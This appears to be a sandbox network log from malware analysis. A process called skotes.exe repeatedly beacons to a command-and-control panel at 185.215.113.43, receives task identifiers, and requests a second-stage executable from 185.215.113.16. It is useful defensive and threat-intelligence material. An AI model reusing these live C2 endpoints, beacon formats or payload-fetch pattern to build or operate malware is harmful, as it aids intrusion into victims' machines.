Nov 4, 2024 17:35:22.646337032 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:35:23.633542061 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:35:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.5	50286	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:35:25.160563946 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:35:26.066329956 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:35:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.5	50287	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:35:27.696275949 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:35:28.644440889 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:35:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.5	50288	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:35:30.174523115 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:35:31.103243113 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:35:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.5	50289	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:35:32.728210926 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:35:33.646080971 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:35:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.5	50290	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:35:35.163410902 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:35:36.287668943 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:35:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Nov 4, 2024 17:35:36.288348913 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:35:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.5	50291	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:35:37.920453072 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:35:38.827064991 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:35:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.5	50293	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:35:40.353926897 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:35:41.275113106 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:35:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.5	50294	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:35:42.912179947 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:35:43.856004953 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:35:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.5	50295	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:35:45.383228064 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:35:46.329458952 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:35:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.5	50296	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:35:47.956511974 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:35:48.851026058 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:35:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.5	50297	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:35:50.370554924 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:35:51.301457882 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:35:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.5	50298	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:35:53.215198994 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:35:54.134804964 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:35:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.5	50299	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:35:55.659818888 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:35:56.947308064 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:35:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.5	50300	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:35:58.574923992 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:35:59.492594957 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:35:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.5	50301	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:36:01.008898020 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:36:01.928241014 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:36:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.5	50302	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:36:03.562910080 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:36:04.471167088 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:36:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.5	50303	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:36:05.995857954 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:36:07.068823099 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:36:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.5	50304	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:36:08.694052935 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:36:10.006457090 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:36:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Nov 4, 2024 17:36:10.008498907 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:36:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.5	50306	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:36:11.530844927 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:36:12.450611115 CET	558	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:36:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 36 66 0d 0a 20 3c 63 3e 31 30 30 33 39 30 30 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 65 37 65 37 62 39 63 61 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 30 33 39 30 31 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 38 65 36 62 31 63 61 37 32 64 64 35 33 34 64 62 30 35 37 65 62 34 31 30 61 34 39 34 64 39 64 23 31 30 30 33 39 30 32 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 63 66 37 62 38 63 37 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 30 33 39 30 33 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 [TRUNCATED] Data Ascii: 16f <c>1003900001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1003901001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1003902001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1003903001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.5	50307	185.215.113.16	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:36:12.461388111 CET	139	OUT	GET /luma/random.exe HTTP/1.1 Host: 185.215.113.16 If-Modified-Since: Mon, 04 Nov 2024 16:30:26 GMT If-None-Match: "6728f6a2-2d7000"
Nov 4, 2024 17:36:13.395329952 CET	192	IN	HTTP/1.1 304 Not Modified Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:36:13 GMT Last-Modified: Mon, 04 Nov 2024 16:30:26 GMT Connection: keep-alive ETag: "6728f6a2-2d7000"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.5	50310	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:36:15.791841984 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 33 39 30 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1003900001&unit=246122658369
Nov 4, 2024 17:36:16.701653957 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:36:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.5	50311	185.215.113.16	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

